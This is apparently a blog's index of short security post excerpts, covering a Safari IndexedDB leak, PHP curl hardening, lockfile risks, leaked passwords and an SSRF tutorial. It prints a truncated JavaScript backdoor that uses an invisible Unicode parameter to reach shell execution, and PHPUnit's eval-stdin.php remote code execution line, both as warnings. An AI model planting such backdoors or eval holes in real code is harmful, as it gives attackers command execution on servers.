Exploiting IndexedDB API information leaks in Safari 15

There’s a pretty nasty exploit in Safari 15, where sites/tabs that interact with an IndexedDB database leak that name to other tabs. In Safari 15 on macOS, and in all browsers on iOS and iPadOS 15, the IndexedDB API is violating the same-origin policy. Every time a website interacts with a database, a new (empty) …

The Invisible JavaScript Backdoor

Wolfgang Ettlinger carefull crafted this JavaScript snippet, which contains a backdoor. const express = require(‘express’); const util = require(‘util’); const exec = util.promisify(require(‘child_process’).exec); const app = express(); app.get(‘/network_health’, async (req, res) => { const { timeout,ㅤ} = req.query; const checkCommands = [ ‘ping -c 1 google.com’, ‘curl -s http://example.com/’,ㅤ ]; try { await Promise.all(checkCommands.map(cmd => …

PHP Curl Security Hardening

Good post — with accompanying code — on PHP.Watch on how to tighten the almighty curl: Limit Curl Protocols Do not enable automatic redirects unless absolutely necessary If redirects are enabled enabled, limit allowed protocols (if different from #1 above) If redirects are enabled, set a strict limit Set a strict time-out Do not disable …

PHPUnit: A Security Risk?

The author of PHPUnit was a bit surprised when he received a mail stating that PHPUnit was a security risk and hackers could remotely execute PHP code through a file named eval-stdin.php that ships used to ship with PHPUnit. // eval-stdin.php eval ('?>'. \file_get_contents('php://input')); Even though the eval-stdin.php file itself indeed was vulnerable, it never …

Beware when merging Pull Requests with a changed lockfile

When watching a diff that contains a lockfile (say: a yarn.lock for example) on GitHub, GitHub doesn’t always show the differences (see screenshot above) as the changes in such files tend to be quite big. And even if it were to show the changes, does one really take a close look into it? With this …

Princesses make terrible passwords

From the Firefox Blog: When the Disney+ streaming service rolled out, millions of people flocked to set up accounts. And within a week, thousands of poor unfortunate souls reported that their Disney passwords were hacked. According to media reports, some Disney+ account holders have lost their account access while hackers have sold their logins online. …

Learn about security by hacking a fake bank using a real hacking method

Cool interactive site showing your how to perform a Server Side Request Forgery hack, based on a true incident: The following interactive tutorial is a reconstruction of Capital One’s data breach incident that exposed the records of almost 106 million customers. Paige Thompson is accused of breaking into a Capital One server and gaining access …